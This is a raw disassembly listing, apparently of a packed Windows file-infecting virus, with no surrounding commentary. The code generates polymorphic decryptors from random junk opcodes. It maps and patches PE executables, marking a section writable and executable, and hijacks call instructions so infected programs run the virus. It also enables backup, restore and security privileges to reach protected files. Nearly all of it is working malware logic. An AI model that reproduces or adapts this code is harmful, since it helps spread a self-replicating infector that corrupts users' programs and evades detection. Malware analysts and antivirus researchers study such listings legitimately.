		jmp	short loc_3143178A
; ---------------------------------------------------------------------------


loc_3143176A:				; CODE XREF: sub_3143175D+48j
		mov	ax, 0EBh
		stosw
		jmp	short loc_3143178B
; ---------------------------------------------------------------------------


loc_31431772:				; CODE XREF: sub_3143175D+4Cj
		push	4
		pop	eax
		call	near ptr dword_31430B40+43h
		lea	eax, [edx+edx*8]
		shl	eax, 8
		add	ax, 0C089h
		stosw
		jmp	short loc_3143178B
; ---------------------------------------------------------------------------


loc_31431788:				; CODE XREF: sub_3143175D+50j
		mov	al, 90h


loc_3143178A:				; CODE XREF: sub_3143175D+Bj
					; sub_3143175D+60j ...
		stosb


loc_3143178B:				; CODE XREF: sub_3143175D+7j
					; sub_3143175D+13j ...
		push	21h
		pop	eax
		call	near ptr dword_31430B40+43h
		add	byte ptr [ebp+10278Ch],	6
		cmp	dl, 8
		jnb	short locret_314317CE
		test	dl, dl
		jz	short loc_31431766
		dec	dl
		jz	short loc_3143176A
		dec	dl
		jz	short loc_31431772
		dec	dl
		jz	short loc_31431788
		dec	dl
		jz	short loc_314317BF
		dec	dl
		jz	short loc_314317C6
		dec	dl
		jz	short loc_314317CA
		mov	al, 0F9h
		jmp	short loc_3143178A
; ---------------------------------------------------------------------------


loc_314317BF:				; CODE XREF: sub_3143175D+54j
		mov	al, 87h
		stosb
		mov	al, 0DBh
		jmp	short loc_3143178A
; ---------------------------------------------------------------------------


loc_314317C6:				; CODE XREF: sub_3143175D+58j
		mov	al, 0F5h
		jmp	short loc_3143178A
; ---------------------------------------------------------------------------


loc_314317CA:				; CODE XREF: sub_3143175D+5Cj
		mov	al, 0F8h
		jmp	short loc_3143178A
; ---------------------------------------------------------------------------

locret_314317CE:			; CODE XREF: sub_3143175D+40j
		retn
sub_3143175D	endp


; =============== S U B	R O U T	I N E =======================================



sub_314317CF	proc near		; CODE XREF: UPX2:loc_31431C18p
					; UPX2:31431DCBp
		test	dword ptr [ebp+1039B0h], 2000h
		mov	al, 86h
		jnz	short loc_314317DF
		add	al, 4


loc_314317DF:				; CODE XREF: sub_314317CF+Cj
		lea	ecx, [edi-2]
		mov	ah, [ebp+1039A8h]
		stosw
		cmp	ah, 5
		jnz	short loc_314317F6
		mov	al, 0
		or	byte ptr [edi-1], 40h
		stosb


loc_314317F6:				; CODE XREF: sub_314317CF+1Ej
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 4000h
		mov	ax, 3166h
		jnz	short loc_3143180D
		mov	ah, 29h


loc_3143180D:				; CODE XREF: sub_314317CF+3Aj
		stosw
		mov	al, 18h
		or	al, [ebp+1039AAh]
		shl	al, 3
		stosb
		call	sub_3143175D
		mov	al, 88h
		test	dword ptr [ebp+1039B0h], 8000h
		jnz	short loc_31431830
		mov	al, 86h


loc_31431830:				; CODE XREF: sub_314317CF+5Dj
		mov	ah, [ebp+1039A8h]
		stosw
		cmp	ah, 5
		jnz	short locret_31431844
		mov	al, 0
		or	byte ptr [edi-1], 40h
		stosb

locret_31431844:			; CODE XREF: sub_314317CF+6Cj
		retn
sub_314317CF	endp

; ---------------------------------------------------------------------------


loc_31431845:				; CODE XREF: sub_3143244B+183p
		lea	edi, [ebp+1039BCh]
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short near ptr unk_3143185F
		mov	al, 60h
		stosb
; ---------------------------------------------------------------------------
unk_3143185F	db 0F7h	; 		; CODE XREF: UPX2:3143185Aj
		db  85h	; 
		db 0B0h	; 
		db  39h	; 9
		db  10h
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		adc	[edi+eax-48h], dh
		push	ebp
		mov	ebp, esp
		add	[ebx-4F7A08B1h], ch
		cmp	[eax], edx
		add	[ebx], al
; ---------------------------------------------------------------------------
		db 2 dup(0), 2
		dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h
		dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h
		dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h
		dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh
		dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
		dd 1039B085h, 300h, 0F6137400h,	1039AE85h, 0A748000h, 0FFFDAAE8h
		dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h
		dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah
		dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
		dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h
		dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
		dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h
		dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h
		dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
		dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
		dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
		dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h
		dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h
		dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh,	0FD4BE8ABh
		dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
		dd 1039AAh, 4C0048Dh, 8E0C140h,	0AB668DB0h, 57AA01B0h
		dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h
		dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
		dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h
		dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0
		dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
		dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh,	1039A8h
		dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h
		dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h,	42B8BD89h
		dd 0F7AB0010h, 1039B085h, 0
; ---------------------------------------------------------------------------
		inc	eax
		jnz	short loc_31431AF0
		mov	al, 50h
		add	al, [ebp+1039A8h]
		stosb


loc_31431AF0:				; CODE XREF: UPX2:31431AE5j
		test	dword ptr [ebp+1039B0h], 80h
		jnz	short loc_31431B07
		mov	al, 0B8h
		or	al, [ebp+1039A9h]
		stosb
		jmp	short loc_31431B44
; ---------------------------------------------------------------------------


loc_31431B07:				; CODE XREF: UPX2:31431AFAj
		mov	ax, 1831h
		test	dword ptr [ebp+1039B0h], 100h
		jz	short loc_31431B19
		mov	al, 29h


loc_31431B19:				; CODE XREF: UPX2:31431B15j
		or	ah, [ebp+1039A9h]
		shl	ah, 3
		or	ah, [ebp+1039A9h]
		stosw
		mov	ax, 0F081h
		test	dword ptr [ebp+1039B0h], 200h
		jnz	short loc_31431B3C
		mov	ah, 0C8h


loc_31431B3C:				; CODE XREF: UPX2:31431B38j
		or	ah, [ebp+1039A9h]
		stosw


loc_31431B44:				; CODE XREF: UPX2:31431B05j
		mov	[ebp+1042D4h], edi
		mov	eax, 29BCh
		stosd
		test	dword ptr [ebp+1039B0h], 8
		jz	short loc_31431BCD
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 400h
		jnz	short loc_31431B78
		mov	al, 0B8h
		or	al, [ebp+1039AAh]
		stosb
		jmp	short loc_31431BC5
; ---------------------------------------------------------------------------


loc_31431B78:				; CODE XREF: UPX2:31431B6Bj
		test	dword ptr [ebp+1039B0h], 800h
		jnz	short loc_31431B95
		mov	ax, 0E083h
		or	ah, [ebp+1039AAh]
		stosw
		xor	eax, eax
		stosb
		jmp	short loc_31431BAA
; ---------------------------------------------------------------------------


loc_31431B95:				; CODE XREF: UPX2:31431B82j
		mov	ax, 1829h
		or	ah, [ebp+1039AAh]
		shl	ah, 3
		or	ah, [ebp+1039AAh]
		stosw


loc_31431BAA:				; CODE XREF: UPX2:31431B93j
		test	dword ptr [ebp+1039B0h], 1000h
		mov	ax, 0C081h
		jz	short loc_31431BBD
		add	ah, 8


loc_31431BBD:				; CODE XREF: UPX2:31431BB8j
		or	ah, [ebp+1039AAh]
		stosw


loc_31431BC5:				; CODE XREF: UPX2:31431B76j
		movzx	eax, byte ptr [ebp+1039AEh]
		stosd


loc_31431BCD:				; CODE XREF: UPX2:31431B5Aj
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 40000000h
		jz	short loc_31431BEC
		mov	al, 50h
		add	al, [ebp+1039A8h]
		stosb
		call	sub_3143175D


loc_31431BEC:				; CODE XREF: UPX2:31431BDCj
		lea	ecx, [edi-2]
		mov	[ebp+1042BCh], ecx
		test	dword ptr [ebp+1039B0h], 80000000h
		jz	short loc_31431C18
		mov	al, 0E8h
		stosb
		mov	eax, [ebp+1042E0h]
		sub	eax, edi
		sub	eax, 4
		stosd
		mov	[ebp+1042E0h], edi
		jmp	short loc_31431C1D
; ---------------------------------------------------------------------------


loc_31431C18:				; CODE XREF: UPX2:31431BFFj
		call	sub_314317CF


loc_31431C1D:				; CODE XREF: UPX2:31431C16j
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 10000h
		jnz	short loc_31431C39
		mov	al, 40h
		or	al, [ebp+1039A8h]
		stosb
		jmp	short loc_31431C48
; ---------------------------------------------------------------------------


loc_31431C39:				; CODE XREF: UPX2:31431C2Cj
		mov	ax, 0C083h
		or	ah, [ebp+1039A8h]
		stosw
		mov	al, 1
		stosb


loc_31431C48:				; CODE XREF: UPX2:31431C37j
		test	dword ptr [ebp+1039B0h], 20000h
		jnz	short loc_31431C83
		test	dword ptr [ebp+1039B0h], 40000h
		jnz	short loc_31431C7A
		mov	al, 0C0h
		or	al, [ebp+1039AAh]
		mov	ah, [ebp+1039AFh]
		shl	eax, 10h
		mov	ax, 8166h
		stosd
		mov	al, 0
		jmp	short loc_31431C82
; ---------------------------------------------------------------------------


loc_31431C7A:				; CODE XREF: UPX2:31431C5Ej
		mov	al, 40h
		or	al, [ebp+1039AAh]


loc_31431C82:				; CODE XREF: UPX2:31431C78j
		stosb


loc_31431C83:				; CODE XREF: UPX2:31431C52j
		test	dword ptr [ebp+1039B0h], 80000h
		jnz	short loc_31431C9F
		mov	ax, 0E883h
		or	ah, [ebp+1039A9h]
		stosw
		mov	al, 1
		jmp	short loc_31431CA7
; ---------------------------------------------------------------------------


loc_31431C9F:				; CODE XREF: UPX2:31431C8Dj
		mov	al, 48h
		or	al, [ebp+1039A9h]


loc_31431CA7:				; CODE XREF: UPX2:31431C9Dj
		stosb
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 100000h
		mov	cl, 75h
		jnz	short loc_31431CE0
		mov	ax, 0F883h
		or	ah, [ebp+1039A9h]
		stosw
		xor	eax, eax
		stosb
		sub	[ebp+1042BCh], edi
		test	dword ptr [ebp+1039B0h], 200000h
		jnz	short loc_31431CFB
		mov	cl, 77h
		jmp	short loc_31431CFB
; ---------------------------------------------------------------------------


loc_31431CE0:				; CODE XREF: UPX2:31431CB9j
		mov	ax, 1809h
		or	ah, [ebp+1039A9h]
		shl	ah, 3
		or	ah, [ebp+1039A9h]
		stosw
		sub	[ebp+1042BCh], edi


loc_31431CFB:				; CODE XREF: UPX2:31431CDAj
					; UPX2:31431CDEj
		mov	al, cl
		mov	ah, [ebp+1042BCh]
		stosw
		mov	al, 58h
		add	al, [ebp+1039A8h]
		stosb
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 2000003h
		jz	short loc_31431D4B
		test	dword ptr [ebp+1039B0h], 8000000h
		jnz	short loc_31431D4B
		test	dword ptr [ebp+1039B0h], 6000000h
		jnz	short loc_31431D41
		call	sub_314316EB
		call	sub_3143175D


loc_31431D41:				; CODE XREF: UPX2:31431D35j
		call	sub_31431717
		call	sub_3143175D


loc_31431D4B:				; CODE XREF: UPX2:31431D1Dj
					; UPX2:31431D29j
		test	dword ptr [ebp+1039B0h], 10000000h
		jz	short loc_31431D5F
		mov	al, 0C9h
		stosb
		call	sub_3143175D


loc_31431D5F:				; CODE XREF: UPX2:31431D55j
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short loc_31431D95
		mov	al, 7
		sub	al, [ebp+1039A8h]
		shl	eax, 1Ah
		or	eax, 240889h
		add	ah, [ebp+1039A8h]
		shl	ah, 3
		add	ah, 4
		stosd
		call	sub_3143175D
		mov	al, 61h
		stosb
		call	sub_3143175D


loc_31431D95:				; CODE XREF: UPX2:31431D69j
		mov	ax, 0E0FFh
		or	ah, [ebp+1039A8h]
		stosw
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 20h
		jz	short loc_31431E21
		test	dword ptr [ebp+1039B0h], 80000000h
		jz	short loc_31431DDD
		mov	eax, edi
		mov	ecx, [ebp+1042E0h]
		sub	eax, ecx
		mov	[ecx-4], eax
		call	sub_314317CF
		call	sub_3143175D
		mov	al, 0C3h
		stosb
		call	sub_3143175D


loc_31431DDD:				; CODE XREF: UPX2:31431DBCj
		mov	eax, edi
		mov	ecx, [ebp+1042B4h]
		sub	eax, ecx
		mov	[ecx-4], eax
		mov	al, 58h
		or	al, [ebp+1039A8h]
		stosb
		call	sub_3143175D
		test	dword ptr [ebp+1039B0h], 800000h
		jz	short loc_31431E10
		mov	ax, 0C350h
		or	al, [ebp+1039A8h]
		jmp	short loc_31431E1A
; ---------------------------------------------------------------------------


loc_31431E10:				; CODE XREF: UPX2:31431E02j
		mov	ax, 0E0FFh
		or	ah, [ebp+1039A8h]


loc_31431E1A:				; CODE XREF: UPX2:31431E0Ej
		stosw
		call	sub_3143175D


loc_31431E21:				; CODE XREF: UPX2:31431DB0j
		test	dword ptr [ebp+1039B0h], 2000003h
		jz	short loc_31431E8C
		mov	ecx, edi
		mov	eax, [ebp+1042CCh]
		sub	ecx, eax
		mov	[eax-4], ecx
		xor	ecx, ecx
		test	dword ptr [ebp+1039B0h], 1000000h
		jnz	short loc_31431E56
		lea	eax, [ebp+1039A8h]


loc_31431E4E:				; CODE XREF: UPX2:31431E54j
		mov	cl, [eax]
		inc	eax
		cmp	cl, 3
		jnb	short loc_31431E4E


loc_31431E56:				; CODE XREF: UPX2:31431E46j
		lea	eax, ds:102444h[ecx*8]
		shl	eax, 8
		mov	al, 8Bh
		stosd
		jecxz	short loc_31431E6B
		mov	ax, 0C031h
		stosw


loc_31431E6B:				; CODE XREF: UPX2:31431E63j
		mov	ax, 808Fh
		push	0B8h
		add	ah, cl
		stosw
		pop	eax
		stosd
		test	ecx, ecx
		jnz	short loc_31431E84
		mov	ax, 0C031h
		stosw


loc_31431E84:				; CODE XREF: UPX2:31431E7Cj
		mov	al, 0C3h
		stosb
		call	sub_3143175D


loc_31431E8C:				; CODE XREF: UPX2:31431E2Bj
		lea	eax, [ebp+1039BCh]
		test	dword ptr [ebp+1039B0h], 20000000h
		jnz	short loc_31431EA4
		push	edi
		sub	edi, eax
		pop	eax
		jmp	short loc_31431EBD
; ---------------------------------------------------------------------------


loc_31431EA4:				; CODE XREF: UPX2:31431E9Cj
		mov	edx, [ebx+28h]
		sub	edi, eax
		sub	edx, eax
		mov	ecx, [ebp+1042D4h]
		add	[ebp+1042B4h], edx
		add	[ecx], edi
		mov	eax, [esp+4]


loc_31431EBD:				; CODE XREF: UPX2:31431EA2j
		mov	[ebp+101069h], edi
		mov	edi, [ebp+1042B8h]
		sub	eax, [ebp+1042B4h]
		test	dword ptr [ebp+1039B0h], 40h
		jz	short loc_31431EDD
		neg	eax


loc_31431EDD:				; CODE XREF: UPX2:31431ED9j
		stosd
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_31431EE1	proc near		; CODE XREF: sub_3143244B+336p
		push	esi
		push	edi
		cmp	dword ptr [ebp+1042F0h], 0
		jz	loc_314320C9
		call	near ptr loc_31431F01+1
		dec	ebx
		inc	ebp
		push	edx
		dec	esi
		inc	ebp
		dec	esp
		xor	esi, [edx]
		db	2Eh
		inc	esp
		dec	esp
		dec	esp


loc_31431F01:				; CODE XREF: sub_31431EE1+Fp
		add	bh, bh
sub_31431EE1	endp ; sp-analysis failed

		xchg	eax, ebp
		sahf
		db	3Eh
		adc	[eax], al
		mov	[ebp+104304h], eax
		push	ebx
		mov	ebx, [eax+3Ch]
		add	ebx, eax
		push	dword ptr [ebx+28h]
		mov	eax, [ebx+34h]
		call	sub_31431404
		mov	edx, [ebp+1042E4h]
		pop	ebx
		add	eax, [edx+0Ch]
		mov	[ebp+104308h], eax
		add	eax, [edx+8]
		mov	[ebp+10430Ch], eax
		mov	esi, [ebx+28h]
		push	dword ptr [ebx+80h]
		call	sub_31431404
		mov	edi, [ebp+1042E4h]
		push	esi
		call	sub_31431404
		mov	edx, [ebp+1042E4h]
		mov	ecx, [edx+8]
		add	ecx, [edx+0Ch]
		sub	ecx, esi
		sub	ecx, 5
		js	loc_314320C9
		jz	loc_314320C9
		add	esi, [ebp+1042E8h]
		add	esi, [ebp+1042A4h]
; START	OF FUNCTION CHUNK FOR sub_3143209A


loc_31431F7B:				; CODE XREF: sub_3143209A+29j
		lodsb
		cmp	al, 0E8h
		jnz	loc_31432026
		lea	eax, [esi+4]
		sub	eax, [ebp+1042A4h]
		add	eax, [esi]
		push	eax
		call	sub_31431404
		cmp	dword ptr [ebp+1042E4h], 0
		jnz	short loc_31431FA9
		cmp	eax, [edi+0Ch]
		jnb	loc_314320C2
		jmp	short loc_31431FB5
; ---------------------------------------------------------------------------


loc_31431FA9:				; CODE XREF: sub_3143209A-FEj
		cmp	[ebp+1042E4h], edx
		jnz	loc_314320C2


loc_31431FB5:				; CODE XREF: sub_3143209A-F3j
		add	eax, [ebp+1042A4h]
		cmp	word ptr [eax],	25FFh
		jnz	loc_314320C2
		mov	eax, [eax+2]
		sub	eax, [ebx+34h]
		push	eax
		call	sub_31431404
		cmp	[ebp+1042E4h], edi
		jnz	loc_314320C2
		add	eax, [ebp+1042E8h]
		add	eax, [ebp+1042A4h]
		mov	eax, [eax]
		sub	eax, [edi+0Ch]
		jb	loc_314320C2
		cmp	eax, [edi+8]
		jnb	loc_314320C2


loc_31431FFE:				; CODE XREF: sub_3143209A+22j
		add	eax, 2
		add	eax, [edi+14h]
		add	eax, [ebp+1042A4h]
		push	edx
		push	eax
		push	dword ptr [ebp+104304h]
		call	dword ptr [ebp+103E5Eh]
		pop	edx
		test	eax, eax
		jnz	loc_314320D8
		jmp	loc_314320C2
; ---------------------------------------------------------------------------


loc_31432026:				; CODE XREF: sub_3143209A-11Cj
		cmp	al, 0FFh
		jnz	loc_314320C2
		cmp	byte ptr [esi],	15h
		jnz	loc_314320C2
		mov	eax, [esi+1]
		sub	eax, [ebx+34h]
		push	eax
		call	sub_31431404
		cmp	[ebp+1042E4h], edi
		jnz	short loc_314320C2
		add	eax, [ebp+1042E8h]
		add	eax, [ebp+1042A4h]
		mov	[ebp+104310h], eax
		mov	eax, [eax]
		cmp	eax, [ebp+104308h]
		jb	short loc_3143206F
		cmp	eax, [ebp+10430Ch]
		jb	short loc_314320D8


loc_3143206F:				; CODE XREF: sub_3143209A-35j
		cmp	eax, 70000000h
		jb	short loc_314320AD
		call	sub_3143209A
		lea	ecx, [esi-4]
		mov	eax, ecx
		sub	eax, [edx]
		add	eax, [edx+10h]
		cmp	eax, [ebp+104310h]
		jnz	short locret_31432099
		add	esp, 10h
		push	dword ptr [ecx]
		pop	[esp-0Ch+arg_24]
		popa
		jmp	short loc_314320B4
; ---------------------------------------------------------------------------

locret_31432099:			; CODE XREF: sub_3143209A-Fj
		retn
; END OF FUNCTION CHUNK	FOR sub_3143209A

; =============== S U B	R O U T	I N E =======================================



sub_3143209A	proc near		; CODE XREF: sub_3143209A-24p

var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_24		= dword	ptr  28h

; FUNCTION CHUNK AT 31431F7B SIZE 0000011F BYTES

		pop	dword ptr [ebp+1042C4h]
		pusha
		mov	esi, [ebp+1042A4h]
		call	sub_3143150B
		popa


loc_314320AD:				; CODE XREF: sub_3143209A-26j
		test	eax, 80000000h
		jnz	short loc_314320C2


loc_314320B4:				; CODE XREF: sub_3143209A-3j
		sub	eax, [edi+0Ch]
		jb	short loc_314320C2
		cmp	eax, [edi+8]
		jb	loc_31431FFE


loc_314320C2:				; CODE XREF: sub_3143209A-F9j
					; sub_3143209A-EBj ...
		dec	ecx
		jnz	loc_31431F7B


loc_314320C9:				; CODE XREF: sub_31431EE1+9j
					; UPX2:31431F63j ...
		mov	edi, [esp-4+arg_0]
		and	dword ptr [edi+29B0h], 0FFBFFFFFh
		jmp	short loc_3143211A
; ---------------------------------------------------------------------------


loc_314320D8:				; CODE XREF: sub_3143209A-7Fj
					; sub_3143209A-2Dj
		or	dword ptr [edx+24h], 0E0000060h
		dec	esi
		xor	eax, eax
		mov	ecx, [esp+8+var_8]
		xchg	eax, [ebp+1042F0h]
		mov	[ebp+1042ECh], eax
		lea	edi, [ecx+29B4h]
		add	eax, [ebp+1042A4h]
		movsw
		movsd
		dec	esi
		sub	eax, esi
		add	eax, [edx+14h]
		sub	eax, [edx+0Ch]
		mov	byte ptr [esi-5], 0E8h
		mov	dword ptr [ecx+54h], 5
		mov	[esi-4], eax


loc_3143211A:				; CODE XREF: sub_3143209A+3Cj
		pop	edi
		pop	esi
		retn
sub_3143209A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143211D	proc near		; CODE XREF: UPX2:3143241Ep

; FUNCTION CHUNK AT 31432247 SIZE 00000002 BYTES

		push	edi
		call	dword ptr [ebp+103EAAh]
		shr	eax, 1Fh
		jnz	loc_31432247
		push	eax
		push	esp
		push	28h
		push	0FFFFFFFFh
		call	dword ptr [ebp+103F0Ah]
		test	eax, eax
		pop	edi
		js	loc_31432247
		call	sub_3143059F
		call	near ptr loc_31432158+5
		push	ebx
		db	65h
		jz	short near ptr unk_31432196
		imul	ebp, [ebp+53h],	72756365h


loc_31432158:				; CODE XREF: sub_3143211D+2Ap
		imul	esi, [ecx+edi*2+41h], 78B5FF00h
sub_3143211D	endp ; sp-analysis failed

		inc	edx
		adc	[eax], al
		call	dword ptr [ebp+103E5Eh]
		mov	[ebp+104280h], eax
		call	near ptr loc_3143218C+1
		push	ebx
		db	65h
		push	esp
		popa
		imul	esp, [ebp+4Fh],	77h
		outsb
		db	65h
		jb	short loc_314321F3
		push	72507069h
		imul	esi, [esi+69h],	6567656Ch


loc_3143218C:				; CODE XREF: UPX2:3143216Fp
		add	[edi-18h], dl
		sub	eax, ebp
; ---------------------------------------------------------------------------
		db 0FFh
		db 0FFh
		db 0E8h	; 
		db  13h
		db    0
unk_31432196	db    0			; CODE XREF: sub_3143211D+30j
		db    0
		db  53h	; S
		db  65h	; e
		db  52h	; R
		db  65h	; e
		db  73h	; s
		db  74h	; t
		db  6Fh	; o
		db  72h	; r
		db  65h	; e
		db  50h	; P
		db  72h	; r
		db  69h	; i
		db  76h	; v
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  67h	; g
		db  65h	; e
		db    0
		db  57h	; W
		db 0E8h	; 
		db  0Bh
		db 0E8h	; 
		db 0FFh
		db 0FFh
		db 0E8h	; 
		db  12h
		db    0
		db    0
		db    0
		db  53h	; S
		db  65h	; e
		db  42h	; B
		db  61h	; a
		db  63h	; c
		db  6Bh	; k
		db  75h	; u
		db  70h	; p
		db  50h	; P
		db  72h	; r
		db  69h	; i
		db  76h	; v
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  67h	; g
		db  65h	; e
		db    0
		db  57h	; W
		db 0E8h	; 
		db 0EEh	; 
		db 0E7h	; 
		db 0FFh
		db 0FFh
		db 0E8h	; 
		db  18h
		db    0
		db    0
		db    0
		db  53h	; S
		db  65h	; e
		db  43h	; C
		db  68h	; h
		db  61h	; a
		db  6Eh	; n
		db  67h	; g
		db  65h	; e
		db  4Eh	; N
		db  6Fh	; o
		db  74h	; t
		db  69h	; i
		db  66h	; f
		db  79h	; y
		db  50h	; P
		db  72h	; r
		db  69h	; i
		db  76h	; v
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  67h	; g
		db  65h	; e
		db    0
		db  57h	; W
		db 0E8h	; 
		db 0CBh	; 
		db 0E7h	; 
		db 0FFh
		db 0FFh
		db  50h	; P
		db  54h	; T
; ---------------------------------------------------------------------------


loc_314321F3:				; CODE XREF: UPX2:3143217Dj
		lea	eax, [ebp+103DBCh]
		push	64h
		push	eax
		push	1
		push	edi
		call	dword ptr [ebp+103F16h]
		mov	[esp], edi
		call	dword ptr [ebp+103E52h]
		sub	al, al
		lea	edi, [ebp+104174h]
		push	eax
		push	eax
		push	eax
		push	dword ptr [ebp+103DBCh]
		push	40001h
		push	esp
		push	1
		push	edi
		call	dword ptr [ebp+104280h]
		push	esp
		push	4
		push	edi
		call	dword ptr [ebp+104280h]
		add	esp, 14h
		push	dword ptr [ebp+104278h]
		call	dword ptr [ebp+103E8Eh]
; START	OF FUNCTION CHUNK FOR sub_3143211D


loc_31432247:				; CODE XREF: sub_3143211D+Aj
					; sub_3143211D+1Fj
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_3143211D

; =============== S U B	R O U T	I N E =======================================



sub_31432249	proc near		; CODE XREF: UPX2:31432417p
					; UPX2:31432423p ...
		lea	esi, [ebp+104174h]
		push	esi
		call	dword ptr [ebp+103E92h]
		cmp	eax, 0FFFFFFFFh
		jz	locret_3143231A
		mov	[ebp+104284h], eax
		push	0
		push	esi
		call	dword ptr [ebp+103ECEh]
		test	eax, eax
		jz	locret_3143231A
		sub	eax, eax
		push	eax
		push	eax
		push	3
		push	eax
		push	1
		push	0C0000000h
		push	esi
		call	dword ptr [ebp+103E6Eh]
		cmp	eax, 0FFFFFFFFh
		jz	loc_3143289B
		mov	[ebp+104288h], eax
		lea	ecx, [ebp+10428Ch]
		lea	edx, [ebp+104294h]
		push	ecx
		push	edx
		push	0
		push	eax
		call	dword ptr [ebp+103E9Ah]
		cmp	eax, 0FFFFFFFFh
		jz	loc_3143288F
		push	0
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103E96h]
		cmp	eax, 0FFFFFFFFh
		jz	loc_3143288F
		mov	[ebp+10429Ch], eax
		xor	ecx, ecx
		add	eax, ebx
		push	ecx
		push	eax
		push	ecx
		push	4
		push	ecx
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103E72h]
		test	eax, eax
		jz	loc_3143288F
		xor	ecx, ecx
		mov	[ebp+1042A0h], eax
		push	ecx
		push	ecx
		push	ecx
		push	0F001Fh
		push	eax
		call	dword ptr [ebp+103EBAh]
		test	eax, eax
		jz	loc_31432867
		mov	[ebp+1042A4h], eax

locret_3143231A:			; CODE XREF: sub_31432249+10j
					; sub_31432249+27j ...
		retn
sub_31432249	endp

; ---------------------------------------------------------------------------


loc_3143231B:				; CODE XREF: sub_3143244B+188p
					; sub_3143244B+2A0p
		mov	eax, 7317h
		mov	ecx, [ebx+38h]
; ---------------------------------------------------------------------------
		db 0F7h	; 
		db  85h	; 
		db 0B0h	; 
		db  39h	; 9
		db  10h
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		and	[ebp+6], dh
		add	eax, [ebp+101069h]
		xor	edx, edx
		add	eax, ecx
		div	ecx
		mul	ecx
		mov	[ebp+1042B0h], eax
		mov	eax, 29BBh
		mov	ecx, [ebx+3Ch]
		add	eax, [ebp+101069h]
		xor	edx, edx
		add	eax, ecx
		div	ecx
		mul	ecx
		mov	[ebp+1042A8h], eax
		retn

; =============== S U B	R O U T	I N E =======================================



sub_31432360	proc near		; CODE XREF: sub_3143244B:loc_314324C0p
					; sub_3143244B+1B4p
		movzx	ecx, word ptr [ebx+6]
		stc


loc_31432365:				; CODE XREF: sub_31432360+23j
		jecxz	short locret_3143239C
		lea	edx, [ebx+18h]
		movzx	eax, word ptr [ebx+14h]
		add	edx, eax
		dec	ecx
		imul	eax, ecx, 28h
		add	edx, eax
		cmp	dword ptr [edx], 6E69775Fh
		stc
		jz	short locret_3143239C
		cmp	dword ptr [edx+0Ch], 1
		jb	short loc_31432365
		mov	ecx, [ebx+3Ch]
		mov	eax, [edx+14h]
		add	eax, [edx+10h]
		lea	eax, [eax+ecx*2-1]
		neg	ecx
		and	eax, ecx
		cmp	eax, [ebp+10429Ch]

locret_3143239C:			; CODE XREF: sub_31432360:loc_31432365j
					; sub_31432360+1Dj ...
		retn
sub_31432360	endp


; =============== S U B	R O U T	I N E =======================================



sub_3143239D	proc near		; CODE XREF: UPX2:31432435p

arg_C		= dword	ptr  10h

		mov	edx, [esp+arg_C]
		xor	eax, eax
		pop	dword ptr [edx+0B8h]
		retn
sub_3143239D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------


loc_314323AA:				; CODE XREF: UPX2:314323CBj
		mov	ecx, edi
		jmp	short loc_314323B9
; ---------------------------------------------------------------------------
		lea	edi, [ebp+104174h]
		cld


loc_314323B5:				; CODE XREF: UPX2:314323C7j
		mov	ebx, edi
		xor	ecx, ecx


loc_314323B9:				; CODE XREF: UPX2:314323ACj
					; UPX2:314323CFj
		lodsb
		cmp	al, 61h
